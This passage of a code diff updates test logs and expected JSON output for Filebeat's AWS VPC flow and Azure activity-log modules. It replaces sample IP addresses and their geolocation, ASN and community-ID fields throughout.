@@ -457,7 +417,7 @@
         "http.response.status_code": 200,
         "http.version": "1.1",
         "input.type": "log",
-        "log.offset": 3700,
+        "log.offset": 3698,
         "related.user": [
             "67797214d75628047d9c76b18a78cded1a4b069b71f2a9d5a53649c38da8770b"
         ],
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
index 6355e43b4806..8e925989de6a 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
+++ b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log
@@ -1,5 +1,5 @@
 version account-id interface-id srcaddr dstaddr srcport dstport protocol packets bytes start end action log-status
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
-2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
+2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK
+2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK
 2 123456789010 eni-1235b8ca123456789 203.0.113.12 172.31.16.139 0 0 1 4 336 1432917027 1432917142 ACCEPT OK
 2 123456789010 eni-1235b8ca123456789 172.31.16.139 203.0.113.12 0 0 1 4 336 1432917094 1432917142 REJECT OK
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
index dbc6ebb3150a..3f2adbd186d6 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
+++ b/x-pack/filebeat/module/aws/vpcflow/test/accept-reject-traffic.log-expected.json
@@ -8,22 +8,23 @@
         "aws.vpcflow.version": "2",
         "cloud.account.id": "123456789010",
         "cloud.provider": "aws",
-        "destination.address": "158.109.0.1",
-        "destination.as.number": 13041,
-        "destination.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 40.4172,
-        "destination.geo.location.lon": -3.684,
-        "destination.ip": "158.109.0.1",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 22,
         "event.category": "network_traffic",
         "event.dataset": "aws.vpcflow",
         "event.end": "2014-12-14T04:07:50.000Z",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK",
+        "event.original": "2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 20641 22 6 20 4249 1418530010 1418530070 ACCEPT OK",
         "event.outcome": "allow",
         "event.start": "2014-12-14T04:06:50.000Z",
         "event.type": "flow",
@@ -31,29 +32,27 @@
         "input.type": "log",
         "log.offset": 115,
         "network.bytes": 4249,
-        "network.community_id": "1:Ln/vlDqu658GHymxjnRAaUF8KS4=",
+        "network.community_id": "1:Tb5MsUIr7kDM5nsrp+bdl73tSAc=",
         "network.iana_number": "6",
         "network.packets": 20,
         "network.transport": "tcp",
         "network.type": "ipv4",
         "related.ip": [
-            "158.109.0.1",
-            "78.24.182.42"
+            "175.16.199.1",
+            "175.16.199.1"
         ],
         "service.type": "aws",
-        "source.address": "78.24.182.42",
-        "source.as.number": 35377,
-        "source.as.organization.name": "Ao a.b.n.",
+        "source.address": "175.16.199.1",
         "source.bytes": 4249,
-        "source.geo.city_name": "Moscow",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "78.24.182.42",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.packets": 20,
         "source.port": 20641,
         "tags": [
@@ -70,52 +69,51 @@
         "aws.vpcflow.version": "2",
         "cloud.account.id": "123456789010",
         "cloud.provider": "aws",
-        "destination.address": "158.109.0.1",
-        "destination.as.number": 13041,
-        "destination.as.organization.name": "Consorci de Serveis Universitaris de Catalunya",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "ES",
-        "destination.geo.country_name": "Spain",
-        "destination.geo.location.lat": 40.4172,
-        "destination.geo.location.lon": -3.684,
-        "destination.ip": "158.109.0.1",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 3389,
         "event.category": "network_traffic",
         "event.dataset": "aws.vpcflow",
         "event.end": "2014-12-14T04:07:50.000Z",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "2 123456789010 eni-1235b8ca123456789 78.24.182.42 158.109.0.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK",
+        "event.original": "2 123456789010 eni-1235b8ca123456789 175.16.199.1 175.16.199.1 49761 3389 6 20 4249 1418530010 1418530070 REJECT OK",
         "event.outcome": "deny",
         "event.start": "2014-12-14T04:06:50.000Z",
         "event.type": "flow",
         "fileset.name": "vpcflow",
         "input.type": "log",
-        "log.offset": 228,
+        "log.offset": 229,
         "network.bytes": 4249,
-        "network.community_id": "1:E3lDDGXG7D8azpdrN7WMLPJe30w=",
+        "network.community_id": "1:24uPcY6msuW1pExR5YFPCyWN5zI=",
         "network.iana_number": "6",
         "network.packets": 20,
         "network.transport": "tcp",
         "network.type": "ipv4",
         "related.ip": [
-            "158.109.0.1",
-            "78.24.182.42"
+            "175.16.199.1",
+            "175.16.199.1"
         ],
         "service.type": "aws",
-        "source.address": "78.24.182.42",
-        "source.as.number": 35377,
-        "source.as.organization.name": "Ao a.b.n.",
+        "source.address": "175.16.199.1",
         "source.bytes": 4249,
-        "source.geo.city_name": "Moscow",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "RU",
-        "source.geo.country_name": "Russia",
-        "source.geo.location.lat": 55.7527,
-        "source.geo.location.lon": 37.6172,
-        "source.geo.region_iso_code": "RU-MOW",
-        "source.geo.region_name": "Moscow",
-        "source.ip": "78.24.182.42",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.packets": 20,
         "source.port": 49761,
         "tags": [
@@ -146,7 +144,7 @@
         "event.type": "flow",
         "fileset.name": "vpcflow",
         "input.type": "log",
-        "log.offset": 343,
+        "log.offset": 345,
         "network.bytes": 336,
         "network.community_id": "1:H//CCQJhRqDUJ9c23S0VrQ+drxU=",
         "network.iana_number": "1",
@@ -190,7 +188,7 @@
         "event.type": "flow",
         "fileset.name": "vpcflow",
         "input.type": "log",
-        "log.offset": 451,
+        "log.offset": 453,
         "network.bytes": 336,
         "network.community_id": "1:cfQqw/Kh6+4yqhEKgkCw/m3WoJM=",
         "network.iana_number": "1",
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
index 32c4f31a9b67..de0ff4010a7f 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
+++ b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log
@@ -1,4 +1,4 @@
 version vpc-id subnet-id instance-id interface-id account-id type srcaddr dstaddr srcport dstport pkt-srcaddr pkt-dstaddr protocol bytes packets start end action tcp-flags log-status
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43638 5001 52.213.180.42 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK
-3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 52.213.180.42 5001 43638 10.0.0.62 52.213.180.42 6 967 14 1566933133 1566933193 ACCEPT 19 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43416 5001 216.160.83.57 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43638 5001 216.160.83.57 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK
+3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 216.160.83.57 5001 43638 10.0.0.62 216.160.83.57 6 967 14 1566933133 1566933193 ACCEPT 19 OK
diff --git a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
index 46420161eb5f..26243b2065b6 100644
--- a/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
+++ b/x-pack/filebeat/module/aws/vpcflow/test/tcp-flag-sequence.log-expected.json
@@ -7,7 +7,7 @@
         "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
         "aws.vpcflow.log_status": "OK",
         "aws.vpcflow.pkt_dstaddr": "10.0.0.62",
-        "aws.vpcflow.pkt_srcaddr": "52.213.180.42",
+        "aws.vpcflow.pkt_srcaddr": "216.160.83.57",
         "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
         "aws.vpcflow.tcp_flags": "2",
         "aws.vpcflow.tcp_flags_array": [
@@ -27,7 +27,7 @@
         "event.end": "2019-08-26T19:48:53.000Z",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43416 5001 52.213.180.42 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK",
+        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43416 5001 216.160.83.57 10.0.0.62 6 568 8 1566848875 1566848933 ACCEPT 2 OK",
         "event.outcome": "allow",
         "event.start": "2019-08-26T19:47:55.000Z",
         "event.type": "flow",
@@ -35,29 +35,28 @@
         "input.type": "log",
         "log.offset": 183,
         "network.bytes": 568,
-        "network.community_id": "1:HQ1oJYZ+9SJOoeju7badiLfvwls=",
+        "network.community_id": "1:5DIeCY/P+BURA89VEsK87fPS688=",
         "network.iana_number": "6",
         "network.packets": 8,
         "network.transport": "tcp",
         "network.type": "ipv4",
         "related.ip": [
             "10.0.0.62",
-            "52.213.180.42"
+            "216.160.83.57"
         ],
         "service.type": "aws",
-        "source.address": "52.213.180.42",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
+        "source.address": "216.160.83.57",
+        "source.as.number": 209,
         "source.bytes": 568,
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "IE",
-        "source.geo.country_name": "Ireland",
-        "source.geo.location.lat": 53.3338,
-        "source.geo.location.lon": -6.2488,
-        "source.geo.region_iso_code": "IE-L",
-        "source.geo.region_name": "Leinster",
-        "source.ip": "52.213.180.42",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.packets": 8,
         "source.port": 43416,
         "tags": [
@@ -73,7 +72,7 @@
         "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
         "aws.vpcflow.log_status": "OK",
         "aws.vpcflow.pkt_dstaddr": "10.0.0.62",
-        "aws.vpcflow.pkt_srcaddr": "52.213.180.42",
+        "aws.vpcflow.pkt_srcaddr": "216.160.83.57",
         "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
         "aws.vpcflow.tcp_flags": "3",
         "aws.vpcflow.tcp_flags_array": [
@@ -94,7 +93,7 @@
         "event.end": "2019-08-27T19:13:13.000Z",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 52.213.180.42 10.0.0.62 43638 5001 52.213.180.42 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK",
+        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 216.160.83.57 10.0.0.62 43638 5001 216.160.83.57 10.0.0.62 6 1260 17 1566933133 1566933193 ACCEPT 3 OK",
         "event.outcome": "allow",
         "event.start": "2019-08-27T19:12:13.000Z",
         "event.type": "flow",
@@ -102,29 +101,28 @@
         "input.type": "log",
         "log.offset": 393,
         "network.bytes": 1260,
-        "network.community_id": "1:nOrJcppKxIxs557D2oKADkNCpno=",
+        "network.community_id": "1:NKnj38v7hoqC47oCLJ5opK+yqZc=",
         "network.iana_number": "6",
         "network.packets": 17,
         "network.transport": "tcp",
         "network.type": "ipv4",
         "related.ip": [
             "10.0.0.62",
-            "52.213.180.42"
+            "216.160.83.57"
         ],
         "service.type": "aws",
-        "source.address": "52.213.180.42",
-        "source.as.number": 16509,
-        "source.as.organization.name": "Amazon.com, Inc.",
+        "source.address": "216.160.83.57",
+        "source.as.number": 209,
         "source.bytes": 1260,
-        "source.geo.city_name": "Dublin",
-        "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "IE",
-        "source.geo.country_name": "Ireland",
-        "source.geo.location.lat": 53.3338,
-        "source.geo.location.lon": -6.2488,
-        "source.geo.region_iso_code": "IE-L",
-        "source.geo.region_name": "Leinster",
-        "source.ip": "52.213.180.42",
+        "source.geo.city_name": "Milton",
+        "source.geo.continent_name": "North America",
+        "source.geo.country_iso_code": "US",
+        "source.geo.country_name": "United States",
+        "source.geo.location.lat": 47.2513,
+        "source.geo.location.lon": -122.3149,
+        "source.geo.region_iso_code": "US-WA",
+        "source.geo.region_name": "Washington",
+        "source.ip": "216.160.83.57",
         "source.packets": 17,
         "source.port": 43638,
         "tags": [
@@ -139,7 +137,7 @@
         "aws.vpcflow.instance_id": "i-01234567890123456",
         "aws.vpcflow.interface_id": "eni-1235b8ca123456789",
         "aws.vpcflow.log_status": "OK",
-        "aws.vpcflow.pkt_dstaddr": "52.213.180.42",
+        "aws.vpcflow.pkt_dstaddr": "216.160.83.57",
         "aws.vpcflow.pkt_srcaddr": "10.0.0.62",
         "aws.vpcflow.subnet_id": "subnet-aaaaaaaa012345678",
         "aws.vpcflow.tcp_flags": "19",
@@ -154,25 +152,24 @@
         "cloud.account.id": "123456789010",
         "cloud.instance.id": "i-01234567890123456",
         "cloud.provider": "aws",
-        "destination.address": "52.213.180.42",
-        "destination.as.number": 16509,
-        "destination.as.organization.name": "Amazon.com, Inc.",
-        "destination.geo.city_name": "Dublin",
-        "destination.geo.continent_name": "Europe",
-        "destination.geo.country_iso_code": "IE",
-        "destination.geo.country_name": "Ireland",
-        "destination.geo.location.lat": 53.3338,
-        "destination.geo.location.lon": -6.2488,
-        "destination.geo.region_iso_code": "IE-L",
-        "destination.geo.region_name": "Leinster",
-        "destination.ip": "52.213.180.42",
+        "destination.address": "216.160.83.57",
+        "destination.as.number": 209,
+        "destination.geo.city_name": "Milton",
+        "destination.geo.continent_name": "North America",
+        "destination.geo.country_iso_code": "US",
+        "destination.geo.country_name": "United States",
+        "destination.geo.location.lat": 47.2513,
+        "destination.geo.location.lon": -122.3149,
+        "destination.geo.region_iso_code": "US-WA",
+        "destination.geo.region_name": "Washington",
+        "destination.ip": "216.160.83.57",
         "destination.port": 43638,
         "event.category": "network_traffic",
         "event.dataset": "aws.vpcflow",
         "event.end": "2019-08-27T19:13:13.000Z",
         "event.kind": "event",
         "event.module": "aws",
-        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 52.213.180.42 5001 43638 10.0.0.62 52.213.180.42 6 967 14 1566933133 1566933193 ACCEPT 19 OK",
+        "event.original": "3 vpc-abcdefab012345678 subnet-aaaaaaaa012345678 i-01234567890123456 eni-1235b8ca123456789 123456789010 IPv4 10.0.0.62 216.160.83.57 5001 43638 10.0.0.62 216.160.83.57 6 967 14 1566933133 1566933193 ACCEPT 19 OK",
         "event.outcome": "allow",
         "event.start": "2019-08-27T19:12:13.000Z",
         "event.type": "flow",
@@ -180,14 +177,14 @@
         "input.type": "log",
         "log.offset": 605,
         "network.bytes": 967,
-        "network.community_id": "1:nOrJcppKxIxs557D2oKADkNCpno=",
+        "network.community_id": "1:NKnj38v7hoqC47oCLJ5opK+yqZc=",
         "network.iana_number": "6",
         "network.packets": 14,
         "network.transport": "tcp",
         "network.type": "ipv4",
         "related.ip": [
             "10.0.0.62",
-            "52.213.180.42"
+            "216.160.83.57"
         ],
         "service.type": "aws",
         "source.address": "10.0.0.62",
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
index 4b47c46d236c..acef3e8e9840 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
+++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log
@@ -1 +1 @@
-{"callerIpAddress":"51.251.141.41","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"}
+{"callerIpAddress":"216.160.83.61","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"}
diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
index 245269fbfb6d..31368dde9e4d 100644
--- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
+++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json
@@ -35,36 +35,43 @@
         "azure.resource.namespace": "AZURELSEVENTS",
         "azure.resource.provider": "MICROSOFT.EVENTHUB",
         "azure.subscription_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53",
-        "client.ip": "51.251.141.41",
+        "client.ip": "216.160.83.61",
         "cloud.provider": "azure",
         "event.action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION",
         "event.dataset": "azure.activitylogs",
         "event.duration": 0,
         "event.kind": "event",
         "event.module": "azure",
-        "event.original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}",
+        "event.original": "{\"callerIpAddress\":\"216.160.83.61\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}",
         "event.type": [
             "change"
         ],
         "fileset.name": "activitylogs",
-        "geo.continent_name": "Europe",
